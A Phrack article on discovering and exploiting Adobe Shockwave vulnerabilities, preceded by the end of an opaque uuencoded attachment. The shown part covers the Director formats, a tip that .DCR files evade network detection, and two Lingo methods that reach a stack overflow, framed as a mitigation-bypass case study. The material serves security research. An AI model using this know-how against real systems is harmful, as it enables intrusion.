M`F24V.N,]R/P:RT-+1&LK1U"-8C,%+*04J4&:[H>?8A2AX?UQ?.>S([G32V2
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
)__BS,=$`<!(`
`
end

--[ EOF


--------------------------------------------------------------------------------


                              ==Phrack Inc.==

                Volume 0x0f, Issue 0x45, Phile #0x08 of 0x10

|=-----------------------------------------------------------------------=|
|=---------------=[       The Art of Exploitation       ]=---------------=|
|=-----------------------------------------------------------------------=|
|=------------------------=[  Adobe Shockwave  ]=------------------------=|
|=----------------=[ A case study on memory disclosure ]=----------------=|
|=-----------------------------------------------------------------------=|
|=--------------------------=[ aaron portnoy ]=--------------------------=|
|=-------------------=[ deft_phrack at thunkers.net ]=-------------------=|
|=-----------------------------------------------------------------------=|


--[ Table of contents

 1 - Introduction
 2 - Shockwave Overview
  2.1 - Deployment Notes
  2.2 - Supported File Formats
  2.3 - Creating Director Files
  2.4 - Relevant Shockwave Modules
  2.5 - The Lingo Scripting Language
 3 - Vulnerability Discovery
  3.2 - Stack-based Buffer Overflow
  3.3 - Stack-based Memory Disclosure
   3.3.1 - Undocumented Format Specifier
 4 - Exploit Delivery
  4.1 - Server-side Architecture
   4.1.1 - web.py
   4.1.2 - lighttpd
  4.2 - The HTML
  4.3 - The Javascript
  4.4 - The Lingo
  4.5 - The Python
 5 - Vulnerability Exploitation
  5.1 - Windows XP SP3 / Firefox / Shockwave 11.6.5.635
  5.2 - Windows XP SP3 / Firefox / Shockwave 11.6.8.638
  5.3 - Windows 7 x64  / Firefox / Shockwave 12.0.0.112
  5.4 - Windows 7 x64  / Firefox / Shockwave 12.0.0.112 / EMET 5.0
   5.4.1 - Relevant 'EMET 5.0' Mitigations
  5.5 - Windows 8 x64  / Firefox / Shockwave 12.0.0.112 / EMET 5.0
   5.5.1 - Relevant 'EMET 5.0 Tech Preview' Mitigations
 6 - Future Work
 7 - Conclusion
 8 - Greets
 9 - References
 10 - Exploit


--[ 1 - Introduction

These days, proper exploit development on the latest and greatest operating
systems is a time-consuming task. It doesn't help matters that the
availability of public resources to help individuals research techniques to
achieve such ends are becoming scarce. There are many reasons why this is
now the case. Mainly, techniques to bypass security mitigations have become
a valuable commodity to various entities and as such are no longer released
as often for public dissemination or to further one's reputation.

I was lucky enough to get started in this field when there were resources
like Gera's insecure programming challenges [1], 29A [2], Uninformed [3],
and of course Phrack to inspire me. I've tried to imagine what it would be
like to be a newcomer in current times and it's a bit depressing that most
(not all) of the material that is actually published is done so with an
unhealthy bit of rodomontade and ulterior motives. Generally, the output
lacks details that are most facilitating to an aspiring researcher--the
approaches to the problem (including the failures) that so define how a
so-called hacker really thinks.

This article is intended to give the reader insight into an approach to the
vulnerability discovery and exploitation process. By no means should the
take-away from this be that mitigations are broken or easily defeated, but
rather it serves as a case study demonstrating real-world vulnerabilities
and the process by which I was able to achieve successful code execution in
spite of various mitigations that have hitherto not been bypassed publicly.

What follows is walk through of the discovery and exploitation of a memory
disclosure vulnerability and a stack-based buffer overflow that together
can be abused to bypass stack cookies (/GS), SafeSEH (/SAFESEH), full
process Address Space Layout Randomization (ASLR, /DYNAMICBASE), Data
Execution Prevention (DEP), Structured Exception Handler Overwrite
Protection (SEHOP), and the Enhanced Mitigation Experience Toolkit (EMET)
to gain reliable code execution against a multitude of platforms, but with
a focus on Windows 8 x64.

The bugs discussed herein were discovered by myself and where applicable I
will try to cite dates to help the reader understand the time invested to
create the end result. Hopefully there's something in here that you're able
to take away and I'd like to imagine one day you'll also share something
with those who come after you.


--[ 2 - Shockwave Overview

The vulnerabilities I'll be discussing are in Adobe's Shockwave Player [4],
a closed-source application used for viewing Adobe Director media files
within a browser. The player can be installed on Windows and Mac OS
operating systems and is deployed on over 450 million desktops according to
Adobe [5].

Shockwave is often confused with Flash due to Flash's misleading MIME type
of 'application/x-shockwave-flash'. This is not the case, however, and the
technologies are entirely independent of each other (for the record,
Shockwave's MIME type is 'application/x-director').


----[ 2.1 - Deployment Notes

The Shockwave Player is invoked differently depending on which browser/OS
you're running. For example, in the case of Internet Explorer the Shockwave
ActiveX control is instantiated and the Adobe modules are loaded into the
iexplore.exe process space. However, in the case of Firefox, plugins are
loaded via NPAPI [6] and occupy a new child process called
plugin-container.exe.

By default, if a user visits the Shockwave installer site, they are served
up the "slim" version of the installer. The difference between the slim and
the full is that the slim does not contain all the functionality for
various media types (instead they are downloaded when the Player tries to
render a media file with such content).

It should also be noted that the code is distributed as a 32-bit build,
even if deployed on a 64-bit operating system.


----[ 2.2 - Supported File Formats

Shockwave is used to render Adobe Director files. These come in three
forms:

	- .dir is an uncompressed Director file
	- .dcr is Director file compressed in various locations using zlib
	- .dxr is a non-editable Director file

Each of these are undocumented but are based off of the RIFF file format
(except that their data is stored in big endian as denoted by the file
magic value of 'RIFX').

For example, a partial hex dump of a .dir file:


Offset(h) 00 01 02 03 04 05 06 07 08 09 0A 0B 0C 0D 0E 0F
---------------------------------------------------------------------------
00000000  58 46 49 52 78 62 05 00 33 39 56 4D 70 61 6D 69  XFIRxb..39VMpami
00000010  18 00 00 00 01 00 00 00 26 8B 00 00 82 07 00 00  ........&`..`...
00000020  00 00 00 00 00 00 00 00 00 00 00 00 2A 59 45 4B  ............*YEK
00000030  74 01 00 00 0C 00 0C 00 1E 00 00 00 17 00 00 00  t...............
00000040  3E 00 00 00 04 00 00 00 6D 75 68 54 0D 00 00 00  >.......muhT....
00000050  04 00 00 00 44 45 4D 58 2B 00 00 00 4B 00 00 00  ....DEMX+...K...
00000060  6D 75 68 54 6D 00 00 00 4B 00 00 00 44 45 4D 58  muhTm...K...DEMX
...


The .DCR format is useful for bypassing network detection, as no
device/software I am aware of currently knows how to decompress this
proprietary format.


----[ 2.3 - Creating Director Files

Director files are created in, appropriately, Adobe Director [7]. The
interface is very similar to Flash Studio in that there are frames, a movie
object, a stage, cast members, sprites, and script objects.

One quirk worth mentioning is that by default, when 'playing' a file within
Director it uses an older version of the Shockwave libraries (not the ones
in the player's default directory). I'm guessing that this might not be the
case if you're using the latest Director (version 12), but as I was using
warez, well, ... you get it. This can impact your exploit development so
ensure you test outside Director as well (or overwrite the appropriate
modules with newer versions).


----[ 2.4 - Relevant Shockwave Modules

There are two main modules that Shockwave uses to handle parsing and
rendering of DIR files: DIRAPI.dll and IML32.dll. I did a bit of research
on these back in 2011 [8]. Shockwave uses a custom memory manager called
Smartheap [9], but that isn't really of much interest with regard to the
vulnerabilities described in this article.

In addition to those two modules, there are also a number of "Xtras". These
files have .x32 extensions but are simply DLL files. They provide added
functionality for things like embedded media (Quicktime, Flash, 3D objects,
fonts, audio, and so on).


----[ 2.5 - The Lingo Scripting Language

Shockwave files have support for a built-in scripting language called Lingo
which was created in the 1990s and, according to the inventor John
Thompson, was his "...most significant contribution to the computer
industry to date" [10].

Lingo enables a Director developer to interact with multimedia elements and
the user. Its intended functionality is very similar to its Adobe Flash
counterpart, Actionscript. Its syntax, however, is a bit different. There
is an API reference available on Adobe's site [11] that covers mostly
everything you'd need to know about it.

We'll soon see that Lingo can provide an attacker with a wealth of
information to aid in the exploitation process.


--[ 3 - Vulnerability Discovery

I had previously spent a good amount of time bug hunting in Shockwave for a
presentation at CanSecWest and had unearthed a few file format
vulnerabilities. The problem with those, however, is that anybody with the
ability to bit-flip a file can also stumble upon them trivially. So, this
time around I decided to see what I could find in Lingo.

One of the most tedious aspects of bug hunting is figuring out the best way
to generate input to properly cover as much of the attack surface as
possible. My first attempt at this was to don my hipster jeans and learn to
develop Director movies legitimately. I tried to embed as much content as
possible and ensured in a debugger that the appropriate Xtras were being
loaded into the process. The hardest part was learning how to properly
access the objects via Lingo and interact with them in the hopes of causing
a fault.

After exhausting as many Lingo methods as I could manage to invoke (it's a
long list, check out:
http://help.adobe.com/en_US/Director/11.5/UsingScripting
/WSc3ff6d0ea77859461172e0811d64c1a1b3-7ff4.html) I sat back and considered
what to do next.

Following reflection upon my prior attempts, I realized that the one subset
of the available Lingo methods that I was unable to invoke were related to
the 3D API. As it turns out, I was unable to call Lingo's 3D methods
because I could not embed a proper 3D object and initialize the environment
as was required.

I decided the best approach was to find an existing Director file that
already had 3D objects and associated Lingo code in it. After searching a
while I found that Director itself comes with some tutorial files that fit
the need. In the

%ProgramFiles%\Adobe\Adobe Director 11\Configuration\Tutorials\3D

folder are the .dir files I was hoping to find. Once they were loaded into
Director I found the Lingo scripts I could simply modify to invoke the
methods I had previously overlooked.


----[ 3.2 - Stack-based Buffer Overflow

The first vulnerability I discovered was a stack-based buffer overflow that
could be reached via two different Lingo methods (they hit the same
vulnerable code, so I consider them the same bug). The vulnerable methods
were:

    - physicsWorld.loadProxyTemplate(string proxyname, 3dmember)
    - world.createRigidBody(string rigidbodyname, string 3Dmodelname,
    symbolBodyProxy, symbol bodyType, symbol flipNormals)

